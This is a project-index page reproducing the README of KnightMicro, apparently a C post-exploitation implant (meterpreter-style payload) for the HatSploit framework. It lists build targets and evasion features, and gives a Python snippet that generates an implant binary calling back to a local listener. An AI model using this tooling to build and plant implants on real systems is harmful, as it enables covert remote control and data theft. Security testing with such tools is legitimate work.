https://github.com/byt3n33dl3/knightmicro
Empire Implementation of advanced meterpreter payloads.
Science Score: 13.0%
This score indicates how likely this project is to be science-related based on various indicators:
-
○CITATION.cff file
-
✓codemeta.json file
Found codemeta.json file -
○.zenodo.json file
-
○DOI references
-
○Academic publication links
-
○Academic email domains
-
○Institutional organization owner
-
○JOSS paper metadata
-
○Scientific vocabulary similarity
Low similarity (10.5%) to scientific vocabulary
Keywords
Repository
Empire Implementation of advanced meterpreter payloads.
Basic Info
Statistics
- Stars: 3
- Watchers: 1
- Forks: 1
- Open Issues: 0
- Releases: 1
Topics
Metadata Files
README.md
Friendly like a Pony
```shell Knight Cavalry / ,.. / ,' '; ,,.__ _,' /'; . :',' ~~~~ '. '~ :' ( ) )::, '. '. .=----=..-~ .;' ' ;' :: ':. '" (: ': ;) \ '" ./
'" '"
```
KnightMicro is an implementation of an advanced payload written in pure C and designed for portability and extensibility.
This repository contains KnightMicro, which is supposed to work on MacOS, Linux, Windows and iOS, but can be ported to almost every POSIX system. KnightMicro is optimized to work with or without HatSploit Framework.
Features
- Portable C code that can be compiled for a big range of targets.
- Support for MacOS, Linux, Windows and iOS targets.
- Small executable with low resource utilization optimized for embedded systems.
- Dynamically Extendable, supports loading plugins (TABs) which extend its functionality.
- Evasion techniques such as process migration and in-memory loading.
Installing
To install KnightMicro you simply need to install HatSploit Framework and this will make KnightMicro available automatically.
python
pip3 install git+https://github.com/EntySec/HatSploit
Building
Building dependencies:
shell
make TARGET=<target>
NOTE: For MacOS / iOS targets you are required to set SDK to the desired SDK path before running make. For example:
shell
make TARGET=<target> SDK=<path>
You can find list of supported TARGET values for different platforms.
Linux
aarch64-linux-muslarmv5l-linux-musleabiarmv5b-linux-musleabii486-linux-muslx86_64-linux-muslpowerpc-linux-muslsfpowerpc64le-linux-muslmips-linux-muslsfmipsel-linux-muslsfmips64-linux-musls390x-linux-muslWindows
x86_64-w64-mingw32x86_64-w64-mingw32MacOS / iOS
arm-iphone-darwinaarch64-iphone-darwini386-apple-darwinx86_64-apple-darwinaarch64-apple-darwinBuilding sources:
shell
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -B build
cmake --build build
NOTE: For MacOS / iOS targets you are required to set CMAKE_OSX_SYSROOT to the desired SDK path with -D. For example:
shell
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -DCMAKE_OSX_SYSROOT=<path> -B build
NOTE: Toolchains are located at toolchain/cmake/.
These are other cmake build options:
MAIN- Should beONif you want to build a source file to executable.SOURCE- Custom executable source file (default are insrc/main/).DEBUG- Should beONif you want to build KnightMicro in debug mode.BUNDLE- Build as bundle (macOS specific flag, adds-bundle)
Basic usage
To use KnightMicro and build payloads you should import it to your source.
python3
from KnightMicro import KnightMicro
from KnightMicro.session import KnightMicroSession
KnightMicro- KnightMicro object that is used to generate payload implant.
```python3 KnightMicro = KnightMicro( target='aarch64-apple-darwin', options={ 'uri': 'tcp://127.0.0.1:8888' } )
with open('payload.exe', 'wb') as f: f.write(KnightMicro.to_binary()) ```
KnightMicroSession- Wrapper forHatSploitSessionfor KnightMicro, HatSploit should use it with KnightMicro payload. It might also be used without HatSploit as demonstrated inexamples/listener.py.
Projects
- SeaShell Framework - iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information. SeaShell actively uses KnightMicro implant to communicate with iOS.
Caveats
The code provided in this repository has not yet been prepared for use in a production environment. It can be improved, so any contribution is welcome. You can even experience memory leaks, so we'll be glad to accept every single PR which is fixing a potential issue.
Thanks To
- EntySec
Owner
- Name: Sulaiman
- Login: byt3n33dl3
- Kind: user
- Location: Error 403: Not on earth
- Website: https://byt3n33dl3.substack.com/
- Twitter: byt3n33dl3
- Repositories: 91
- Profile: https://github.com/byt3n33dl3
I N F R A X 8 6
GitHub Events
Total
- Watch event: 1
Last Year
- Watch event: 1
Issues and Pull Requests
Last synced: 10 months ago
All Time
- Total issues: 0
- Total pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Total issue authors: 0
- Total pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0
Past Year
- Issues: 0
- Pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Issue authors: 0
- Pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0
Top Authors
Issue Authors
Pull Request Authors
Top Labels
Issue Labels
Pull Request Labels
Dependencies
- pex *